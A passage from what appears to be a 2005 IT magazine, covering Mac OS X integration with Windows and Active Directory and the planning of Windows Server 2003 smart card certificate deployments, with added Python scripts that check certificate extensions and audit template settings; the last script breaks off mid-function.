When Macintosh printers are shared using SFM, the Windows-based server captures them. This means that print jobs sent from Mac clients are spooled to the server first. They are then converted to a bitmap format recognizable by the Windows-based printer driver and then sent to the printer. This allows you to manage Macintosh print jobs in the Windows-based print queues along with any other print jobs that were sent from computers running Windows. While this does work, it's not always the best solution. There are often problems when the print jobs are converted. Printouts are not always accurate, and sometimes don't print at all. Driver problems also plague this configuration.

In a larger environment, it is often necessary to manage print jobs in this manner. In a smaller environment, however, it's usually best to allow the Mac clients to bypass the Windows-based server and print directly to the printers. Although you lose central control, the jobs will print properly most of the time. This can be accomplished in a few different ways. Many printers have native support for AppleTalk, in which case the printers will show up on the Macs as AppleTalk devices, allowing you to print directly to them. Another possibility is to print through TCP/IP directly to the printer.


Native OS X Support

If you don't need to support the Classic Mac environment at all, you may be able to get all the functionality you need right out of the box with OS X. OS X has the ability to access Windows-based shares without any additional server-side configuration. To access a file share, tell the Mac which server and share you would like to connect to, and then authenticate. Press ⌘-K, or select Go | Connect to Server... from the Finder menu, and the related dialog box should appear (see Figure 1).


Winter 2005 63 


Figure 2 Macintosh Share Login Screen (SMB/CIFS Filesystem Authentication dialog: "Enter username and password for G:", with Workgroup/Domain, Username and Password fields, an Add to Keychain check box, and Cancel and OK buttons)


Enter your file share following one of the formats shown here:

smb://servername/sharename
smb://fullyqualifieddomainname/sharename


You will then be prompted with a login screen similar to Figure 2.

If you enter your domain, username, and password, you will have access to the share. The only configuration requirement for this is that you must use TCP/IP. Permissions are set on the server and are tied to your domain login. OS X doesn't require any special file space or configuration, and files do not require a resource and a data fork. In fact, the files look as if they came from a machine running Windows. You still must log in to each resource and you're not integrated with Active Directory, but you can get to file shares a lot more quickly. As an added bonus, OS X can be configured to show up in a workgroup and share files with your Windows-based machines as well.

There is one caveat: you must know where you're going. Because you are not integrated with Active Directory, you cannot browse for resources past your local subnet. If a resource is remote, you need the server name or IP address and the name of the share to which you would like to connect.

Printing on a Windows-based network from OS X is a little more involved. First, you must open System Preferences | Hardware | Print & Fax, click Set Up Printers, and then click Add. Next, select Windows Printing, then choose your correct domain from Network Neighborhood. Select your server and you will be prompted to log in. Once you have authenticated, a list of available printers will be displayed. Select the printer you want to use and then select the correct driver from the Printer Model drop-down list. You should now be able to print. Printers attached to your OS X machine can be made available to Windows-based clients as well.

So how did Apple make such a jump in functionality? For years, users have been struggling with added services and third-party applications like Dave from Thursby Software. When Apple scrapped the Mac Classic operating system in favor of OS X, much of the work was done for them. Because OS X is based on Unix, Apple was able to integrate Samba, a group of open-source Unix applications that use the Server Message Block (SMB) protocol. This is the protocol used by Windows for client-server networking. As such, Apple inherited most of this functionality from its Unix background. This has not been a trouble-free transition, however.

On a large network, problems quickly arise. You still need to log in to each and every resource you access. This quickly becomes cumbersome on all but the simplest of networks. In addition, the Mac client is not a domain member, which means that there is no domain login account for it. You cannot map your home directory during login. Browsing for resources is very limited; you can only browse on your local subnet. Security becomes an issue because the Mac can cache the user names and passwords for the resources it uses (the Add to Keychain check box in Figure 2). Without an Active Directory login, someone could easily gain access to a Mac client and related domain resources with the locally cached login information.


The Apple OS X Active Directory Client

Apple has finally given us a way to connect to Active Directory. In fact, Apple has been working on its Active Directory client for some time, but it has been plagued by bugs and has been very difficult to configure. Some administrators have had success, but even these modest results have typically been difficult to reproduce.

Early implementations of the Apple cli- 
ent required you to make complicated 
schema changes to Active Directory in or- 
der for it to work. This is quite difficult and 
time consuming. Once these changes are 
made, the functionality is not as robust as 
one would hope. When it is working, do- 
main users can authenticate on a Mac and 
gain access to resources on the domain. 
However, browsing remains a problem as 
do home folders, which I'll discuss later. 

Apple recently released OS X 10.3.4. It's important to have this update when using Apple clients because it apparently has resolved many issues, but it's still not perfect. A single Active Directory login is now supported without making any schema changes in Active Directory. This means that you can configure a Mac to allow domain user accounts to log in, and you can do away with local user accounts. Password changes and updates are supported from the Mac, as are cached passwords for access to your account when you're not connected to the network. You also have the ability to grant administrative access through user names and groups from Active Directory. Hourly login restrictions are supported as well.

There is also some support for home 
folders. You can map a user’s home folder 
during login based upon their profile in Ac- 
tive Directory. This is especially useful when 
users have both PC and Mac computers. 
You can use a single login and mount your 
home folder on the Mac, then use it again 
as your home folder on the PC. This makes 
for easy backup and convenient access to 
all of your work. Unfortunately, you cannot 
use this mapped directory as your home 
folder—there is still a separate home folder 
for each user account locally on the Mac, 
which often causes confusion when users 
are saving files and looking for them later. 
Sometimes users think they have saved a 
file on the server-based home folder, when 
in fact these files are located on the local 
Mac drive. DFS volumes also remain un- 
supported. This can be a big problem in an 
enterprise-level environment, as there will 
be resources that the Mac cannot access. 

The client is configured in OS X with a utility called Directory Access, located in the Applications | Utilities folder. When you open the utility, click Enable next to Active Directory, and then click Active Directory. From this screen you can click Configure, and then enter your Active Directory Forest and Domain. Enter a computer ID for your Mac. Click Unhide Advanced Options, and select the Cache Last User Login for Offline Operation and Allow Administration by: check boxes. Add the usernames and groups to have administrative access to your Mac in the format domain name\user or group, and then click Bind. You will be prompted for a user account with rights to join your domain. Click OK and then click Authentication at the top. Make sure Active Directory is still highlighted. In the Search dropdown list, click Custom Path, and then click Add at the bottom. Select your Active Directory Domain from the list and click Add. Now click Contacts, and then Add. Last, click Apply and close the Directory Access window. After you restart, you should be able to log in with a domain user account and password.

Two of those settings deserve a second look. Cache Last User Login for Offline Operation keeps enough of the user's credential on the Mac to log in while disconnected, so a stolen laptop carries what is needed to log in to it offline; enable it only for users who actually work away from the network. Allow Administration by: gives local administrator rights to every member of the groups you list, so name a small group created for that purpose rather than a broad one such as Domain Users.

Perhaps this still isn't enough for your users. Do you need even more from Active Directory? Apple has an update to OS X, version 10.4 (code-named Tiger), due out next year, that promises to solve some of the security and configuration issues and provide cleaner integration with Active Directory login and home directories. Unfortunately, Apple has a history of dangling the promise of such features in front of its customers without delivering, so we'll have to wait and see.


Macintosh Directory Access Client Configuration

1 Open the Directory Access utility.
2 Click Enable next to Active Directory, and then click Active Directory.
3 Click Configure, then enter your Active Directory Forest and Domain.
4 Enter a computer ID for your Mac client.
5 Click Unhide Advanced Options, and select the Cache Last User Login for Offline Operation and Allow Administration by: check boxes.
6 Add the usernames and groups that you want to give administrative access to your Mac in the format domain name\user or group, and then click Bind. You will be prompted for a user account with rights to join your domain.
7 Click OK and then click Authentication at the top. Make sure Active Directory is still highlighted.
8 Click Custom Path in the Search dropdown list, and then click Add at the bottom.
9 Select your Active Directory Domain from the list and click Add.
10 Click Contacts, and then Add.
11 Click Apply and close the Directory Access window.

ADmitMac to the (Costly) Rescue

Alternatively, you might want to take a look at ADmitMac from Thursby Software. ADmitMac is an enhanced Active Directory client for OS X. NT LAN Manager version 2 (NTLMv2) and SMB signing are both supported. This provides enhanced security when connecting to Windows Server 2003: NTLMv2 replaces the weaker LM and NTLM challenge-response exchanges, and SMB signing adds a message authentication code to each SMB packet so that tampered or injected packets are rejected. If you need access to DFS, ADmitMac is the only product I know that supports it through OS X. ADmitMac also allows you to map server-based home folders for use as home folders on both the Mac and the PC. This means that users who have both a PC and a Mac can have the same home files available to them on either platform, with a single account and no chance of confusion between the two. ADmitMac can also search published resources available in Active Directory. All this is done on the client side with no schema changes to Active Directory. Nevertheless, don't get too excited; this sounds very promising, but there is a catch, as ADmitMac currently costs $119 per client. However, you can download a trial version at www.thursby.com. I love to use ADmitMac because it provides so much support for the added services of Active Directory, but it can become quite expensive if you have a lot of Mac clients.

So, which approach is best? In most of the mixed environments I support, I use SFM simply because there always seems to be a Classic Mac left hanging around somewhere. Unfortunately, this is only a halfway solution and can often be clumsy, confusing, and insecure, particularly when other products offer so much more functionality.

Active Directory integration on OS X has been referred to as "The Holy Grail" for Apple, and its implementation of an Active Directory client is improving with each release. The first white paper released by Apple on Active Directory integration was over 40 pages long. Hopefully, their client will get better with time, but there are still many problems. Fixing them would certainly make integration decisions a lot easier.




Brian Komar

Get Smart! Boost Your Network's IQ With Smart Cards

AT A GLANCE

Smart Card Deployment

Kerberos Authentication

• Using smart cards in an Active Directory environment
• Smart card implementation requirements
• Planning a smart card deployment
• Defining smart card usage in the organization

Brian Komar, of IdentIT Inc., is a principal consultant specializing in PKI consulting engagements. He has authored MCSE Training Kits, Microsoft Prescriptive Architecture Guides, and PKI white papers, and is the coauthor of the Microsoft Windows Security Resource Kit. Contact Brian at bkomar@identit.ca.

This article is an excerpt from the book Microsoft Windows Server 2003 PKI and Certificate Security (Microsoft Press, 2004).

Many organizations are implementing two-factor authentication solutions to increase network security. Two-factor authentication increases security by requiring something you have, such as a smart card or other device with a smart card chip (like a USB token), and something you know, such as the personal identification number (PIN) for the smart card or USB token. To initiate a smart card program, an organization must deploy the related hardware and software to each desktop. The required hardware includes a smart card reader, as well as a smart card that is on the Windows hardware compatibility list or that includes drivers for Windows 2000, Windows XP, or Windows Server 2003 clients on your network. As an alternative, you can use a USB token, which is a combination USB reader and card. For software, you will need a smart card cryptographic service provider (CSP) that allows the Microsoft cryptographic application programming interface (CryptoAPI) to interact with the smart card.

Windows currently ships with default CSPs for GemPlus, Infineon, and Schlumberger, though these CSPs do not work with all versions of these manufacturers' smart cards. You must determine if updated CSPs are required for the smart cards selected by your organization.

Both Windows 2000 and Windows Server 2003 Active Directory environments support smart card authentication, an extension to Kerberos authentication. This means that only Windows 2000, Windows XP, and Windows Server 2003 client computers can be used with smart cards in an Active Directory environment.

Smart cards allow Kerberos authentication through the Public Key Cryptography for Initial Authentication (PKINIT) extensions to the Kerberos protocol. PKINIT extensions allow a public/private key pair to be used to authenticate users when they log onto the network: the client signs its initial ticket request (the AS-REQ pre-authentication data) with the private key held on the card and presents the card's certificate, and the domain controller validates the certificate chain and the signature before issuing a ticket-granting ticket, so the user's password never enters the exchange.


Requirements for Smart Card Certificates

To deploy smart cards in a Windows 2000 or Windows Server 2003 Active Directory environment, the following requirements must be met:

• All domain controllers and computers in the forest must trust the root Certification Authority (CA) of the smart card certificate's certificate chain.

• The CA that issues the smart card certificate must be included in the Active Directory NT Authority (NTAuth) store. When a CA certificate is added to the NTAuth object in Active Directory (CN=NTAuthCertificates, CN=Public Key Services, CN=Services, CN=Configuration, DC=ForestRootDomain, where ForestRootDomain is the LDAP distinguished name of the forest's root domain), the CA certificate is automatically distributed to all Windows 2000 and later domain members, where it is stored under the HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\NTAuth\Certificates registry key in a subkey named by the certificate's thumbprint. You can verify the CA certificates included in the NTAuth store by using the PKI Health Tool (pkiview.msc) included in the Windows Server 2003 Resource Kit.

• The smart card certificate must contain the Smart Card Logon (1.3.6.1.4.1.311.20.2.2) and Client Authentication (1.3.6.1.5.5.7.3.2) object identifiers (OIDs) in the Enhanced Key Usage (EKU) extension or in the Application Policies extension. The Smart Card Logon and Client Authentication OIDs must be valid in the entire certificate chain.

• The smart card certificate must contain the user's UPN in the subject alternative name extension.

• All domain controllers must have a Domain Controller or Domain Controller Authentication certificate installed. Smart card authentication requires mutual authentication of the user and the domain controller involved in the Kerberos authentication.
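The EKU and subject alternative name requirements above are the ones most often missed when a third-party CA issues the smart card certificate, so they are worth checking mechanically before a card is handed out. The following Python script is an added example, not code from the article or from Microsoft: it decodes the DER value of an extKeyUsage extension and of a subjectAltName extension and reports what is missing for smart card logon. It uses only the standard library, so its DER walker covers just the ASN.1 structures those two extensions use. The sample extension values at the bottom are constructed in the script, the UPN jdoe@corp.example.com and the host name host.corp.example.com are made up, and the function names are the author's own; in a real check you would take the two extension values from the issued certificate with a full X.509 parser.

```python
"""Check extKeyUsage and subjectAltName values for Windows smart card logon.
Added illustration, not code from the article; standard library only, so the
DER walker covers just what those two extensions use."""

# OIDs named in the article, plus the otherName type-id Windows uses for a UPN.
SMART_CARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
UPN_OTHERNAME = "1.3.6.1.4.1.311.20.2.3"

def encode_oid(dotted):
    """Dotted OID -> DER content octets (first two arcs packed, base-128 rest)."""
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(reversed(chunk))
    return bytes(body)

def decode_oid(body):
    """DER content octets -> dotted OID (inverse of encode_oid)."""
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:  # a clear high bit ends the arc
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)

def tlv(tag, body):
    """Build one DER tag-length-value element (definite length)."""
    if len(body) < 0x80:
        length = bytes([len(body)])
    else:
        raw = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(raw)]) + raw
    return bytes([tag]) + length + body

def read_tlvs(data):
    """Split DER data into (tag, content) pairs; definite lengths only."""
    items, i = [], 0
    while i < len(data):
        tag, first = data[i], data[i + 1]
        if first < 0x80:
            length, i = first, i + 2
        else:
            nbytes = first & 0x7F
            length = int.from_bytes(data[i + 2:i + 2 + nbytes], "big")
            i += 2 + nbytes
        items.append((tag, data[i:i + length]))
        i += length
    return items

def eku_oids(eku_value):
    """extKeyUsage ::= SEQUENCE OF OBJECT IDENTIFIER"""
    (tag, seq), = read_tlvs(eku_value)
    if tag != 0x30:
        raise ValueError("extKeyUsage value is not a SEQUENCE")
    return [decode_oid(body) for tag, body in read_tlvs(seq) if tag == 0x06]

def san_upns(san_value):
    """UPNs in a subjectAltName. otherName is GeneralName [0] IMPLICIT whose
    content is { type-id OID, value [0] EXPLICIT UTF8String }."""
    (_, general_names), = read_tlvs(san_value)
    upns = []
    for tag, body in read_tlvs(general_names):
        if tag != 0xA0:
            continue
        (_, type_id), (_, explicit_value) = read_tlvs(body)
        if decode_oid(type_id) == UPN_OTHERNAME:
            (_, utf8), = read_tlvs(explicit_value)
            upns.append(utf8.decode("utf-8"))
    return upns

def smart_card_problems(eku_value, san_value):
    """List the EKU/SAN requirements that these two extension values miss."""
    problems, present = [], eku_oids(eku_value)
    for name, oid in (("Smart Card Logon", SMART_CARD_LOGON),
                      ("Client Authentication", CLIENT_AUTH)):
        if oid not in present:
            problems.append(f"EKU is missing {name} ({oid})")
    if not san_upns(san_value):
        problems.append("subjectAltName has no UPN otherName")
    return problems

# Constructed sample extension values (not taken from any real certificate).
def build_eku(*oids):
    return tlv(0x30, b"".join(tlv(0x06, encode_oid(o)) for o in oids))

def build_san_upn(upn):
    other_name = tlv(0x06, encode_oid(UPN_OTHERNAME)) + tlv(0xA0, tlv(0x0C, upn.encode()))
    return tlv(0x30, tlv(0xA0, other_name))

GOOD_EKU = build_eku(SMART_CARD_LOGON, CLIENT_AUTH)
WEB_ONLY_EKU = build_eku(CLIENT_AUTH)                          # typical TLS client cert
GOOD_SAN = build_san_upn("jdoe@corp.example.com")              # made-up UPN
DNS_ONLY_SAN = tlv(0x30, tlv(0x82, b"host.corp.example.com"))  # dNSName is [2] IMPLICIT

if __name__ == "__main__":
    print("compliant sample:", smart_card_problems(GOOD_EKU, GOOD_SAN))
    print("web-only sample:", smart_card_problems(WEB_ONLY_EKU, DNS_ONLY_SAN))
```

Run as a script, the compliant sample reports nothing, while the second sample, a certificate that carries only Client Authentication and a DNS name in its SAN (what an ordinary TLS client certificate looks like), is reported as missing the Smart Card Logon OID and the UPN; that is exactly why such a certificate is rejected at smart card logon even though it chains to a trusted CA.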




A Windows Server 2003 Enterprise Edition CA meets these requirements. Alternatively, a third-party CA can issue a smart card certificate, as long as the requirements are met. The requirements are detailed in Knowledge Base article 281245, "Guidelines for Enabling Smart Card Logon with Third-Party Certification Authorities" (see support.microsoft.com/?id=281245).


Planning Smart Card Deployment

Let's begin with determining the assurance level required for smart card issuance. A smart card increases protection for a certificate's private key. To compromise a smart card's private key, an attacker must obtain the smart card and know the associated PIN. As added protection, a smart card blocks access to the smart card's private key(s) after a designated number of PIN failures. The private key cannot be used again until the smart card is unlocked. You can increase the security of the smart card distribution by requiring face-to-face interviews during enrollment. This requires the user to meet with either the enrollment agent requesting the smart card certificate or with another person, sometimes referred to as a local registration authority (LRA), who verifies the user's identity.

To indicate that you have performed a face-to-face interview before issuing a smart card, you can add a custom certificate policy OID to the Issuance Policies extension that indicates the measures taken to validate the smart card holder's identity before issuance.

To deploy smart card certificates by using face-to-face validation of the user's identity, your organization must provide certificates for the two roles in smart card deployment: the enrollment agent and the smart card holder.

An enrollment agent must hold a certificate that allows them to request a smart card certificate on behalf of another user. This is made possible by including the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) in the EKU or Application Policies extension of the certificate. This functionality is provided in the default version 1 Enrollment Agent certificate template.

The smart card holder must, at a minimum, have a certificate that includes the Smart Card Logon (1.3.6.1.4.1.311.20.2.2) and Client Authentication (1.3.6.1.5.5.7.3.2) OIDs in the certificate's EKU or Application Policies extension. This functionality is provided in two default version 1 certificate templates: Smart Card Logon and Smart Card User.

Some organizations choose to implement version 2 certificate templates based on the default version 1 certificate templates. Version 2 templates allow an organization to require validation of an enrollment agent's identity, enable autoenrollment for certificate renewal, add a certificate policy to describe the issuance method of the smart card certificate, add application policies to the smart card certificate, and enforce the use of a specific smart card CSP.

Once you determine which certificate templates to implement for enrollment agents and smart cards, the next step is to decide how to distribute the certificates to the desired holders. There are three common methods for deploying smart card certificates: implementing enrollment agents, using autoenrollment for initial distribution of certificates, and using autoenrollment for smart card certificate renewal.

Figure 1 Issuance Requirements (the Issuance Requirements tab of the Custom Enrollment Agent template properties: a "This number of authorized signatures" setting, the note that autoenrollment is not allowed if more than one signature is required, and "Require the following for reenrollment" with the choices "Same criteria as for enrollment" and "Valid existing certificate")

An enrollment agent requests a smart card certificate on behalf of each user. The enrollment agent signs the certificate request with a certificate that includes the Certificate Request Agent object identifier in the EKU or Application Policy extension of the enrollment agent's certificate. In addition to issuing the smart card certificate to a user, the enrollment agent also validates the identity of the requesting user by inspecting identification such as a driver's license or a passport.

The enrollment agent must use the Certificate Services Web Enrollment pages to request the smart card certificate on behalf of another user. The Smart Card enrollment pages must be added to the Local intranet security zone, and that zone must allow untrusted ActiveX controls to be downloaded. Apply that zone setting only on the enrollment agent's station, because it loosens the browser for every site placed in the zone, not just the enrollment pages.

Autoenrollment can be used in implementations where additional identity validation measures are not required. When autoenrollment is used, you must ensure that smart cards, smart card readers, and support software such as smart card management software and CSPs are distributed to the users before autoenrollment is initiated. In this solution, the user will be prompted to input their smart card during the autoenrollment process. 

Under the default settings, the process of smart card certificate renewal is the same process used for initial enrollment. In other words, if you have to undergo a background check to receive your initial smart card, you must undergo the same background check to renew the certificate. However, you can reduce the security requirements for smart card renewal. For instance, if you can provide evidence that you have already undergone the background check, there is no need to undergo it again. Two solutions exist to meet this type of deployment: 

• You can configure the certificate template to renew the certificate automatically if users hold existing certificates based on the existing version of the certificate template. By holding an existing certificate, users provide evidence that they have undergone the required validation process. 

• You can require users to sign the certificate renewal request with the existing smart card certificate. By signing the certificate request, the requestors prove they can access the private key of the previous smart card certificate, thus proving that they are the same person that requested the original certificate. 


Certificate Template Design and Configuration 

Once you determine how smart cards are to be used in your organization and how the certificates are to be deployed, you can define the certificate templates. Most organizations use the default Enrollment Agent certificate template. If you implement this template, my only recommendation is that you modify the permissions to allow a custom global or universal group (in the case of a multiple domain forest) only Read and Enroll permissions. Remove the Enroll permission assignment for members of the Enterprise Admins and forest root domain's Domain Admins groups to prevent unauthorized registration of the Enrollment Agent certificate template. 

If you want to implement certificate manager approval for enrollment agent certificates, you must create a version 2 certificate template based on the version 1 Enrollment Agent certificate template. In the version 2 certificate template definition, configure the Issuance Requirements tab (see Figure 1). 

In addition, it is recommended that you add the version 1 Enrollment Agent certificate template to the Superseded Templates tab and restrict enrollment permissions to a custom universal or global group that contains all designated enrollment agents. 

Once the required enrollment agents have obtained their Enrollment Agent certificates, consider removing the Enrollment Agent certificate templates from all CAs in the organization. To help prevent unauthorized certificate enrollment of Enrollment Agent certificates, only publish the certificate template on a CA when a new enrollment agent must be designated or when certificate renewal is required. 

When you are using smart cards, it is recommended that you create a custom version 2 certificate template based on either the default Smart Card Logon or Smart Card User version 1 certificate templates. The version 2 certificate templates give you greater flexibility in the configuration of the certificate contents. 

Figure 2 lists the recommended modifications to the version 2 certificate template. This certificate template can be published at multiple CAs for fault tolerance and must be available at all times to allow an enrollment agent to create a smart card for any user at any time. 

If your organization's security policy requires the same subject validation process for initial smart card enrollment and renewal, you can use the custom certificate template just described. When a smart card certificate is expiring, users can return to the enrollment agent, who can re-enroll on their behalf and provide them with a replacement certificate. If your company has standardized on machines running Windows XP, there is an alternative option that takes advantage of autoenrollment and the ability to sign a certificate by using the initial smart card certificate. 


To take this route you create a custom 
version 2 certificate template that enables 
autoenrollment if the certificate request is 
signed with a previous smart card certifi- 
cate. At the time the previous smart card 
certificate nears expiration, the autoen- 
rollment process will prompt the user to 
sign the certificate request with his existing 
smart card certificate. When the renewal is 
performed, the previous smart card certifi- 
cate is archived and the updated certificate 
remains as the active certificate. 

Figure 3 explains how to configure a ver- 
sion 2 certificate template to use autoen- 
rollment for smart card certificate renewal. 
The certificate template can be based on 
either the Smart Card Logon or Smart Card 
User certificate template. 

The renewal smart card certificate template can be published at multiple CAs for fault tolerance and must be available at all times to allow an enrollment agent to create a smart card for any user at any time. 


Deploying a Smart Card 
Management System 

A smart card deployment must look be- 
yond the issuance of smart card certificates. 
In addition to getting the smart cards to 
the users, the deployment must address the 
customization of the smart card enrollment 
pages and smart card PIN resets. 

First of all, you can customize the default 
enrollment pages with modifications that 
can include such things as adding your 
organization’s logo, changing the signing re- 
quirements for a smart card certificate, or 
simplifying the user experience by remov- 
ing the multitude of options available when 
the user requests a certificate. 

In terms of PIN resets, most smart cards (by default) prevent the user from accessing the smart card's private key if the smart card PIN is entered incorrectly three consecutive times. Your organization must develop custom software or use commercial software to allow the remote reset of a user's smart card. For these solutions, look to the software development kits for the specific smart card vendor or to third-party management systems, such as those available from Alacris (www.alacris.com) and from Spyrus (www.spyrus.com). 

You should remember that smart cards are not a panacea for authentication security. And, there are some applications that cannot use smart cards as an authentication mechanism. During a recent smart card pilot project at Microsoft, where users were required to use smart cards for all forms of authentication, several applications would not work with the updated smart card authentication. 

Outlook Web Access, for example, does not support smart card authentication. You must type credentials into a form or use basic authentication protected by Secure Sockets Layer (SSL). 

Some Exchange Server deployment scenarios contain configuration options that do not support the use of smart card authentication. For example, if the user account and the mail box are situated in different forests, smart card authentication is not possible. Another option that does not support smart card authentication is the implementation of Remote Procedure Calls over HTTP in Microsoft Outlook. Service accounts and batch files also cannot use a smart card for authentication. A scheduled task that implements a service's account will not prompt for smart card insertion or for the input of a PIN to access the private key material on the smart card. 


Figure 2 Custom Initial Smart Card Certificate Template 

Tab: General 
Recommendations: Create a custom Template Display Name and Template Name, based on the organization name, that specifies that the certificate template is for enrollment agents. The validity period is typically no longer than one year. 

Tab: Request Handling 
Recommendations: Make the following changes on the Request Handling tab: 
• Change the Purpose dropdown list to Signature and Smart Card Logon to prevent the smart card from being used for encryption. Setting the purpose to Signature and Smart Card Logon ensures that the user is prompted during enrollment to input the smart card's PIN. 
• Increase the minimum key size to 1,024 bits if using smart cards with 8KB or more storage space. 
• Define the specific smart card CSP you want to use with the certificate template. 

Tab: Subject Name 
Recommendations: The only requirement here is that you ensure that the UPN option is enabled. You should enable the e-mail name options if you intend to use the smart card for S/MIME e-mail purposes. 

Tab: Issuance Requirements 
Recommendations: In order to enable enrollment by an enrollment agent, you need to configure the certificate template to require one authorized signature, with the signing certificate containing the Certificate Request Agent OID. 

Tab: Superseded Templates 
Recommendations: Add both the Smart Card User and Smart Card Logon certificate templates, designating that the custom version 2 certificate template is the organization's preferred version. 

Tab: Extensions 
Recommendations: For application policies, include the Smart Card Logon and Client Authentication. If you want to use the smart card for signing e-mail, include the Secure E-mail OID. In addition, add a custom application policy OID that indicates that the certificate is YourOrganization's smart card. This OID can be used in applications, such as the Microsoft RADIUS server, to restrict certificate usage to only certificates with this custom OID. 
Add a custom certificate policy OID that defines the process used for the smart card certificate. The custom issuance policy OID can also include a Web URL reference that provides a text description of the process. 

Tab: Security 
Recommendations: Modify the permissions for the certificate template so that only a custom global or universal group that contains all enrollment agents has Read and Enroll permissions. Consider removing the Enroll permission assignment from the Enterprise Admins and forest root's Domain Admins groups. 


Figure 3 Custom Renewal Smart Card Certificate Template 

Tab: General 
Recommendations: Create a custom Template Display Name and Template Name, based on the organization name, that specifies that the certificate template is for smart card renewal only. Set the validity period to no longer than one year. 
To prevent the user from continually requesting the replacement smart card certificate, enable Publish Certificate in Active Directory and Do Not Automatically Re-Enroll if a Duplicate Certificate Exists in Active Directory. This publishes the issued certificate in the userCertificate attribute of the user account and prevents re-enrollment if a certificate is already published to the user account. 

Tab: Request Handling 
Recommendations: Change the Purpose dropdown list to Signature and Smart Card Logon, increase the minimum key size to 1,024 bits if using smart cards with 8KB or more storage space, and define the smart card CSP you want to use with the certificate template. 

Tab: Subject Name 
Recommendations: The only required name format for smart card login is to ensure that the UPN option is enabled. Also, enable the e-mail name options if you intend to use the smart card for S/MIME e-mail. 

Tab: Issuance Requirements 
Recommendations: Configure the Issuance Requirements tab to require one authorized signature, with the signing certificate containing the Smart Card Logon OID. If you have implemented a custom application policy OID based on your organization, require this custom application policy OID for signing instead of the Smart Card Logon OID. 

Tab: Superseded Templates 
Recommendations: Add the initial smart card logon certificate template defined in Figure 2. The addition of the superseded template allows autoenrollment to initiate. 

Tab: Extensions 
Recommendations: For application policies, ensure that you include the Smart Card Logon and Client Authentication. If you want to use the smart card for signing e-mail, include the Secure Email OID. In addition, continue adding a custom application policy OID that indicates that the certificate is YourOrganization's Smart Card to allow continued autoenrollment processing for certificate renewal when the certificate expires. 
For issuance policies, add a custom certificate policy OID that defines the process used for the smart card certificate. The custom issuance policy OID can also include a Web URL reference that provides a text description of the process. 

Tab: Security 
Recommendations: Modify the permissions for the certificate template so that only a custom global or universal group that contains all smart card holders has Read, Enroll, and Autoenroll permissions. 
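As an added example (not code from the article), the following Python audits certificate template attributes against the Enrollment Agent guidance above and the Figure 2 and Figure 3 recommendations: the issuance requirement, the enrollment flags, the superseded templates and the permissions. The template dictionaries, the Contoso group names and the ORG_OID value are constructed placeholders; a real audit would read the attributes over LDAP.

```python
"""Audit certificate template attributes against the article's recommendations
for the Enrollment Agent template and the Figure 2 / Figure 3 templates.

Added example, not code from the article.  The template dictionaries are
constructed samples shaped like pKICertificateTemplate attributes; a real audit
would read them over LDAP from the Certificate Templates container of the
Configuration partition.  "acl" is a simplified stand-in for the template's
security descriptor (group name -> set of template rights).
"""

# Application policy (EKU) OIDs named in the article.
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
OID_SMART_CARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"

# msPKI-Enrollment-Flag bits (MS-CRTD) behind the dialog options the figures name.
PEND_ALL_REQUESTS = 0x02    # "CA certificate manager approval"
PUBLISH_TO_DS = 0x08        # "Publish certificate in Active Directory"
CHECK_USER_DS_CERT = 0x10   # "Do not automatically re-enroll if a duplicate exists"
AUTO_ENROLLMENT = 0x20      # template permits autoenrollment

PRIVILEGED = {"Enterprise Admins", "Domain Admins"}


def _privileged_enroll(t):
    """Security tab: the admin groups should not retain Enroll on these templates."""
    return [f"{g} still holds Enroll" for g, r in t["acl"].items()
            if g in PRIVILEGED and "Enroll" in r]


def _signature_required(t, oid):
    """Issuance Requirements tab: exactly one authorized signature carrying `oid`."""
    findings = []
    if t["msPKI-RA-Signature"] != 1:
        findings.append(f"expected 1 authorized signature, found {t['msPKI-RA-Signature']}")
    if oid not in t["msPKI-RA-Application-Policies"]:
        findings.append(f"signing certificate is not required to carry {oid}")
    return findings


def _app_policies(t, custom_oid):
    """Extensions tab: Smart Card Logon, Client Authentication and the org's own OID."""
    need = {OID_SMART_CARD_LOGON, OID_CLIENT_AUTH} | ({custom_oid} if custom_oid else set())
    missing = need - set(t["msPKI-Certificate-Application-Policy"])
    return [f"application policy missing {o}" for o in sorted(missing)]


def audit_enrollment_agent(t):
    """Version 2 Enrollment Agent template: manager approval, agents-only enrollment."""
    findings = _privileged_enroll(t)
    if not t["msPKI-Enrollment-Flag"] & PEND_ALL_REQUESTS:
        findings.append("CA certificate manager approval is not required")
    if not any("Enroll" in r for g, r in t["acl"].items() if g not in PRIVILEGED):
        findings.append("no enrollment agent group holds Enroll")
    return findings


def audit_initial_smartcard(t, custom_oid=None):
    """Figure 2: initial smart card template, enrolled only through an enrollment agent."""
    findings = _privileged_enroll(t) + _signature_required(t, OID_CERT_REQUEST_AGENT)
    findings += _app_policies(t, custom_oid)
    if t["msPKI-Minimal-Key-Size"] < 1024:
        findings.append("minimum key size below 1,024 bits")
    missing = {"SmartcardLogon", "SmartcardUser"} - set(t["msPKI-Supersede-Templates"])
    if missing:
        findings.append(f"does not supersede {sorted(missing)}")
    if t["msPKI-Enrollment-Flag"] & AUTO_ENROLLMENT:
        findings.append("autoenrollment enabled on an agent-issued template")
    return findings


def audit_renewal_smartcard(t, initial_name, custom_oid=None):
    """Figure 3: renewal template, autoenrolled when the request is signed by the old card."""
    findings = _signature_required(t, custom_oid or OID_SMART_CARD_LOGON)
    findings += _app_policies(t, custom_oid)
    want = PUBLISH_TO_DS | CHECK_USER_DS_CERT | AUTO_ENROLLMENT
    if t["msPKI-Enrollment-Flag"] & want != want:
        findings.append("publish-to-AD, no-duplicate and autoenroll flags are not all set")
    if initial_name not in t["msPKI-Supersede-Templates"]:
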